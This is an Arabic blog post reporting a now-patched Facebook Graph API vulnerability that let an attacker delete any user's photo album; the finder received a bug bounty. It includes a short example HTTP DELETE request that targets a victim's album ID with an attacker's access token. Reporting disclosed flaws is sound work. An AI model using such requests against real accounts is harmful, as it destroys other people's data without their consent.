ثغرة في الفيس بوك تسمح للهاكر بحذف البوم صور المستخدم

السلام عليكم

تمكن احد الهاكرز من اكتشاف ثغرة تمكن الهاكر من حذف اي البوم صور من الفيس بوك من دون صلاحيات

ويدعى Laxman Muthiyah ولقد استلم مكافئة من الفيس بوك 12 الف دولار لمساعدة فريق الفيس بوك لترقيع الثغرة

اكتشف الثغرة ف Graph API والي تتطلب access token

مثال كيف يتم استغلال الثغرة عبر ارسال استعلام


Request :-
DELETE /<Victim’s_photo_album_id> HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

 

يمكنكم مشاهدة الفيديو

اطيب الامنيات

 

شارك هاذا المقال !

شاجع

Penetration Test ,Cyber Security , E-forensic ,Cloud Security, Risk Management,Vulnerabilities hunting ,and Programming

لا توجد تعليقات

أضف تعليق